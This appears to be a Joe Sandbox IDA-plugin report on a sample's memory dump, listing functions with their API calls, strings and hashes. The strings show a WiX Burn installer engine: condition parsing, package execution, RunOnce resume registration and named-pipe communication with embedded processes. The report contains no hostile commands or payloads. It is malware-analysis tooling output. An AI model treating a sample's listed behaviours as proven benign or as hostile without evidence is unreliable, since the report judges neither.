Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
API String ID: 760788290-1911311241
Opcode ID: fdf3c96a08a892683b23b0b488adbf53722ef0a98286fbf85bf55a91da924a03
Instruction ID: dbaa8a8d4415d61883edeaec0b000745de4a1192544cf2d4fdce9776287f0205
Opcode Fuzzy Hash: fdf3c96a08a892683b23b0b488adbf53722ef0a98286fbf85bf55a91da924a03
Instruction Fuzzy Hash: 3F412BB5F847A3B6EB2155658D06FAFBA1C7B14731F200323F920B72C2D7E89D418695

Function 004C8F72 Relevance: 35.4, APIs: 8, Strings: 12, Instructions: 430COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,560050DB,00000001,?,004C9946,?,00000000,00000000,?,?,004C992E,?,?,00000000,?), ref: 004C8FB2

Strings

Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 004C91DE
Failed to set symbol value., xrefs: 004C9060
Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 004C9162
Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 004C9098
Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 004C93C4
AND, xrefs: 004C92BC
NOT, xrefs: 004C92DB
condition.cpp, xrefs: 004C9084, 004C914E, 004C91CA, 004C922E, 004C936C, 004C93B0, 004C93F4
Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 004C9242
Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 004C9408
Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 004C9380
-, xrefs: 004C9118

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: StringType
String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
API String ID: 4177115715-3594736606
Opcode ID: 12ce3475e65af7ea36054c3a0653942995ab46a07c84b70da902ed01bbd367e2
Instruction ID: 3f7577c9479b91261e557a8e1a2a3e876d45c0c824dd92bba76bcdee46d2306d
Opcode Fuzzy Hash: 12ce3475e65af7ea36054c3a0653942995ab46a07c84b70da902ed01bbd367e2
Instruction Fuzzy Hash: 22F1D079504201FBDBA8CF94C88DFAA7BA4FB04700F10454FF9159A685C3B9DE92CB99

Function 004D6BCA Relevance: 35.4, APIs: 6, Strings: 14, Instructions: 351synchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 004CD4A8: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,004D7040,000000B8,00000000,?,00000000,76C1B390), ref: 004CD4B7
Part of subcall function 004CD4A8: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 004CD4C6
Part of subcall function 004CD4A8: LeaveCriticalSection.KERNEL32(000000D0,?,004D7040,000000B8,00000000,?,00000000,76C1B390), ref: 004CD4DB

CreateThread.KERNEL32(00000000,00000000,004D57BD,?,00000000,00000000), ref: 004D6E34
GetLastError.KERNEL32(?,?,?,?,?,?,?,004C4522,?,0050B500,?,004C4846,?,?), ref: 004D6E43
CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004C4522,?,0050B500,?,004C4846,?,?), ref: 004D6EA0
ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 004D6F92
CloseHandle.KERNEL32(00000000), ref: 004D6F9B
CloseHandle.KERNEL32(crypt32.dll,?,00000000,?,00000000,00000001,00000000), ref: 004D6FB5

Part of subcall function 004EBD05: SetThreadExecutionState.KERNEL32(80000001), ref: 004EBD0A

Strings

Another per-machine setup is already executing., xrefs: 004D6DC8
Failed to elevate., xrefs: 004D6D94
"EL, xrefs: 004D6EC9, 004D6E14, 004D6ECC
Another per-user setup is already executing., xrefs: 004D6CD8
Failed to create cache thread., xrefs: 004D6E71
crypt32.dll, xrefs: 004D6ECD, 004D6EE7, 004D6FB4
Failed to cache engine to working directory., xrefs: 004D6D71
core.cpp, xrefs: 004D6C8A, 004D6E67
UX aborted apply begin., xrefs: 004D6C94
FHL, xrefs: 004D6EC1, 004D6E1F, 004D6EC4
Failed while caching, aborting execution., xrefs: 004D6E98
Failed to register bundle., xrefs: 004D6DEE
Engine cannot start apply because it is busy with another action., xrefs: 004D6C28
Failed to set initial apply variables., xrefs: 004D6D02

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
String ID: "EL$Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$FHL$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
API String ID: 2169948125-3862305731
Opcode ID: 81c129e0626e1d32f111a0799ab75913aba3429ea7bc54bb79eb27cde51055e1
Instruction ID: 2a9bdfb0815c974c7c9659b6d6fbfdfe3b7cec7d2423ebb935474855aec99913
Opcode Fuzzy Hash: 81c129e0626e1d32f111a0799ab75913aba3429ea7bc54bb79eb27cde51055e1
Instruction Fuzzy Hash: DFC1EE72900615AADF119F60D895BEF3AA9FF04705F01407FFD08AE342DB789981CBA9

Function 004E1BB1 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 004E1CB8
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 004E1CD6

Strings

Failed to get @Code., xrefs: 004E1D98
Failed to parse @Code value: %ls, xrefs: 004E1D91
exeengine.cpp, xrefs: 004E1C39
scheduleReboot, xrefs: 004E1CE5
Type, xrefs: 004E1C90
Failed to select exit code nodes., xrefs: 004E1BDE
Failed to get @Type., xrefs: 004E1DB7
ExitCode, xrefs: 004E1BBF
Failed to get exit code node count., xrefs: 004E1C03
Code, xrefs: 004E1D25
Failed to get next node., xrefs: 004E1DBE
forceReboot, xrefs: 004E1D03
Invalid exit code type: %ls, xrefs: 004E1DA7
error, xrefs: 004E1CC9
success, xrefs: 004E1CA9
Failed to allocate memory for exit code structs., xrefs: 004E1C43

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareHeapString$AllocateProcess
String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeengine.cpp$forceReboot$scheduleReboot$success
API String ID: 2664528157-1714101571
Opcode ID: c822f5dafde283a6c8b2e9974679f434d7dd3d4bee720f8e5302a8de251a7ec4
Instruction ID: eb74ba49da5d258aee112298e1587f492daa3cfcb3132c7e083f5bfd81c93b59
Opcode Fuzzy Hash: c822f5dafde283a6c8b2e9974679f434d7dd3d4bee720f8e5302a8de251a7ec4
Instruction Fuzzy Hash: 33610634E84256BBDB109B96CC41EAEBFA5FF40721F204256F420BB2E0DB74AE41C794

Function 005077F7 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 206COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 00507857
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 0050787C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 0050789C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 005078CF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 005078EB
SysFreeString.OLEAUT32(00000000), ref: 00507916
SysFreeString.OLEAUT32(00000000), ref: 0050798D
SysFreeString.OLEAUT32(00000000), ref: 005079D9

Strings

`5w, xrefs: 00507916, 0050798D, 005079D9
msi.dll, xrefs: 00507975
rel, xrefs: 0050784A
length, xrefs: 0050788E
msasn1.dll, xrefs: 005079C7
href, xrefs: 0050786E
comres.dll, xrefs: 005078A6
feclient.dll, xrefs: 00507889
version.dll, xrefs: 005078FA
type, xrefs: 005078DD
title, xrefs: 005078C1

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: String$Compare$Free
String ID: `5w$comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
API String ID: 318886736-3319342121
Opcode ID: f944c912ed6a8d1aada79f58fcdbc81aecbbdf8781897dd2d4cb3a3bb1a21b75
Instruction ID: 7b07ebc3ec86292d852ab86abf2ff3e86fc6fc1f2d1e89912a1a19fd2138bb1d
Opcode Fuzzy Hash: f944c912ed6a8d1aada79f58fcdbc81aecbbdf8781897dd2d4cb3a3bb1a21b75
Instruction Fuzzy Hash: 41612D71D0921EBBDB15DB94CC45EAEBFB9BF08720F2046A5E521A61E0D730AE10DB90

Function 00508134 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 309COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 00508161
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 0050817C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 0050821F
CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,0050B518,00000000), ref: 0050825E
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 005082B1
CompareStringW.KERNEL32(0000007F,00000000,0050B518,000000FF,true,000000FF), ref: 005082CF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 00508307
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 0050844B

Strings

http://appsyndication.org/2006/appsyn, xrefs: 00508154
exclusive, xrefs: 005082A3
application, xrefs: 0050816E
apuputil.cpp, xrefs: 0050836E
version, xrefs: 00508250, 005082F9
upgrade, xrefs: 00508211
type, xrefs: 005081A7
enclosure, xrefs: 00508439
true, xrefs: 005082C1

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareString
String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
API String ID: 1825529933-3037633208
Opcode ID: dd0cbd0508832a69b427037d20f8ef03ebe414e67f6f76a881b312a169095a90
Instruction ID: 6d36b0d4b01023a5ad1438b15823a390674648f4bf196ead1b8ca9411eb38b3a
Opcode Fuzzy Hash: dd0cbd0508832a69b427037d20f8ef03ebe414e67f6f76a881b312a169095a90
Instruction Fuzzy Hash: 74B18935A04606ABDF209F54CC81F6E7BA6BF44734F258A59F9A5AB2D1DF70E840CB00

Function 004DE3C8 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 146registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004DE2AF: LoadBitmapW.USER32(?,00000001), ref: 004DE2E5
Part of subcall function 004DE2AF: GetLastError.KERNEL32 ref: 004DE2F1

LoadCursorW.USER32(00000000,00007F00), ref: 004DE429
RegisterClassW.USER32(?), ref: 004DE43D
GetLastError.KERNEL32 ref: 004DE448
UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 004DE54D
DeleteObject.GDI32(00000000), ref: 004DE55C

Strings

Unexpected return value from message pump., xrefs: 004DE537
splashscreen.cpp, xrefs: 004DE46C, 004DE4D5
Failed to register window., xrefs: 004DE476
WixBurnSplashScreen, xrefs: 004DE436, 004DE548
Failed to load splash screen., xrefs: 004DE401
Failed to create window., xrefs: 004DE4DF

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
API String ID: 164797020-2188509422
Opcode ID: 6851ebf88aac298808ba3d6352288d9bea69c58a03db761b0e1de8d4efdd961b
Instruction ID: c25cb4b445d59fdd6f89945bdf1eeb8f16686158f96dbd1127946fad745de2f8
Opcode Fuzzy Hash: 6851ebf88aac298808ba3d6352288d9bea69c58a03db761b0e1de8d4efdd961b
Instruction Fuzzy Hash: CA41F776900216BFEB11ABD5EC59EEEBBB8FF04754F100127F901BA250E7349D049BA5

Function 004E9DE1 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 233threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,004EBC85,00000001), ref: 004E9E46
GetLastError.KERNEL32(?,004EBC85,00000001), ref: 004E9FB6
GetExitCodeThread.KERNEL32(00000001,00000000,?,004EBC85,00000001), ref: 004E9FF6
GetLastError.KERNEL32(?,004EBC85,00000001), ref: 004EA000

Strings

Failed to execute dependency action., xrefs: 004E9F36
Failed to get cache thread exit code., xrefs: 004EA031
Failed to execute compatible package action., xrefs: 004E9F73
Failed to execute MSP package., xrefs: 004E9ECB
Invalid execute action., xrefs: 004EA056
Failed to load compatible package on per-machine package., xrefs: 004E9F5C
Cache thread exited unexpectedly., xrefs: 004EA047
Failed to execute EXE package., xrefs: 004E9E7D
apply.cpp, xrefs: 004E9FDD, 004EA027
Failed to execute package provider registration action., xrefs: 004E9F17
Failed to execute MSU package., xrefs: 004E9EFB
Failed to wait for cache check-point., xrefs: 004E9FE7
Failed to execute MSI package., xrefs: 004E9EA6

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
API String ID: 3703294532-2662572847
Opcode ID: e9120928e71b99245a13428f50c3840dd9b526afc3a33c65b29a8007afee1980
Instruction ID: bc327b68f21e390329184f9ab37bf9cc2c19a3b45658a3daa3c41ee1b7df258f
Opcode Fuzzy Hash: e9120928e71b99245a13428f50c3840dd9b526afc3a33c65b29a8007afee1980
Instruction Fuzzy Hash: 7E717F71E0129AEBDB10DF66C941EBF7BB8FB44711F10416AF904E7280D338AE419BA5

Function 004CF210 Relevance: 29.9, APIs: 3, Strings: 14, Instructions: 183registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00503AF1: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 00503B3E

RegCloseKey.ADVAPI32(00000000,?,00510D10,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 004CF440

Part of subcall function 005014A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,004CF28D,00510D10,Resume,00000005,?,00000000,00000000,00000000), ref: 005014BB

Strings

Installed, xrefs: 004CF2A5
"%ls" /%ls, xrefs: 004CF2E5
Failed to delete run key value., xrefs: 004CF3CE
Failed to write run key value., xrefs: 004CF33B
BundleResumeCommandLine, xrefs: 004CF348, 004CF3DB
Failed to format resume command line for RunOnce., xrefs: 004CF2F9
Resume, xrefs: 004CF282
burn.runonce, xrefs: 004CF2DA
Failed to write resume command line value., xrefs: 004CF35D
Failed to create run key., xrefs: 004CF31D
registration.cpp, xrefs: 004CF3C4, 004CF412
Failed to delete resume command line value., xrefs: 004CF41C
Failed to write Resume value., xrefs: 004CF293
Failed to write Installed value., xrefs: 004CF2B6

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseValueVersion
String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$registration.cpp
API String ID: 2348918689-2631711097
Opcode ID: 7c0b595e7f62dfb27a6301b86b13b63ba5464f59f126c1563e0d92308673c346
Instruction ID: 566c5c58895eb5d299ad0da369d609532728080316e05256b8794a03f7884532
Opcode Fuzzy Hash: 7c0b595e7f62dfb27a6301b86b13b63ba5464f59f126c1563e0d92308673c346
Instruction Fuzzy Hash: B8512339940626BADF659AE08C4AFAFBA66BB00714F01017EFD00B6290D77C9D4897CD

Function 004ECC91 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 174processCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(75568FB0,00000002,00000000), ref: 004ECC9D

Part of subcall function 004D4D8D: UuidCreate.RPCRT4(?), ref: 004D4DC0

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,004E2401,?,?,00000000,?,?,?), ref: 004ECD7B
GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 004ECD85
GetProcessId.KERNEL32(004E2401,?,?,00000000,?,?,?,?), ref: 004ECDBD

Part of subcall function 004D54DC: lstrlenW.KERNEL32(?,?,00000000,?,0050B500,?,00000000,?,004C452F,?,0050B500), ref: 004D54FD
Part of subcall function 004D54DC: GetCurrentProcessId.KERNEL32(?,004C452F,?,0050B500), ref: 004D5508
Part of subcall function 004D54DC: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,004C452F,?,0050B500), ref: 004D553F
Part of subcall function 004D54DC: ConnectNamedPipe.KERNEL32(?,00000000,?,004C452F,?,0050B500), ref: 004D5554
Part of subcall function 004D54DC: GetLastError.KERNEL32(?,004C452F,?,0050B500), ref: 004D555E
Part of subcall function 004D54DC: Sleep.KERNEL32(00000064,?,004C452F,?,0050B500), ref: 004D5593
Part of subcall function 004D54DC: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,004C452F,?,0050B500), ref: 004D55B6
Part of subcall function 004D54DC: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,004C452F,?,0050B500), ref: 004D55D1
Part of subcall function 004D54DC: WriteFile.KERNEL32(?,/EL,0050B500,00000000,00000000,?,004C452F,?,0050B500), ref: 004D55EC
Part of subcall function 004D54DC: WriteFile.KERNEL32(?,comres.dll,00000004,feclient.dll,00000000,?,004C452F,?,0050B500), ref: 004D5607

Part of subcall function 00500A28: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,004C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00500A38
Part of subcall function 00500A28: GetLastError.KERNEL32(?,?,004C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00500A46

CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,004ECBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 004ECE41
CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,004ECBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 004ECE50
CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,004ECBEF,?,?,?,?,?,00000000,?,?,?), ref: 004ECE67

Strings

burn.embedded, xrefs: 004ECD38
Failed to create embedded process at path: %ls, xrefs: 004ECDB3
Failed to create embedded pipe name and client token., xrefs: 004ECD00
Failed to process messages from embedded message., xrefs: 004ECE04
Failed to wait for embedded process to connect to pipe., xrefs: 004ECDDF
%ls -%ls %ls %ls %u, xrefs: 004ECD40
Failed to wait for embedded executable: %ls, xrefs: 004ECE24
Failed to create embedded pipe., xrefs: 004ECD27
Failed to allocate embedded command., xrefs: 004ECD54
embedded.cpp, xrefs: 004ECDA6

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
API String ID: 875070380-3803182736
Opcode ID: 96c50e8469fbdaf125b25e9dee107d309b61d94bab63e5bb3b543b3f7900fb2f
Instruction ID: 00e2ec9362659c43dd85bb5487128e6baf9ad53618490e593eee7a5bdcaad32d
Opcode Fuzzy Hash: 96c50e8469fbdaf125b25e9dee107d309b61d94bab63e5bb3b543b3f7900fb2f
Instruction Fuzzy Hash: FA51BE32D00229BBDF119B95DC86FEEBFB8AF04711F100126FA00B6291D7799A419BD9

Function 004CECBE Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 173COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004CEE4C

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

SysFreeString.OLEAUT32(?), ref: 004CEE04

Strings

Failed to get software tag count., xrefs: 004CED13
`5w, xrefs: 004CEE04, 004CEE4C
Failed to get @Path., xrefs: 004CEE95
Failed to get SoftwareTag text., xrefs: 004CEE8B
Failed to select software tag nodes., xrefs: 004CECEE
Regid, xrefs: 004CED9A
Failed to allocate memory for software tag structs., xrefs: 004CED4B
SoftwareTag, xrefs: 004CECCD
registration.cpp, xrefs: 004CED41
Failed to convert SoftwareTag text to UTF-8, xrefs: 004CEE81
Path, xrefs: 004CEDB2
Failed to get next node., xrefs: 004CEEB3
Failed to get @Regid., xrefs: 004CEE9F
Failed to get @Filename., xrefs: 004CEEA9
Filename, xrefs: 004CED7F

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$`5w$registration.cpp
API String ID: 336948655-3801564253
Opcode ID: dd6828218cd18cacb7fdd15a0777f52b85fbe7bbb72c4904a6596151c725f3c4
Instruction ID: 2e2da1e9e42f19a0ae9665326a7f674ce6b18106edf222acef56c1a15dd6c0fc
Opcode Fuzzy Hash: dd6828218cd18cacb7fdd15a0777f52b85fbe7bbb72c4904a6596151c725f3c4
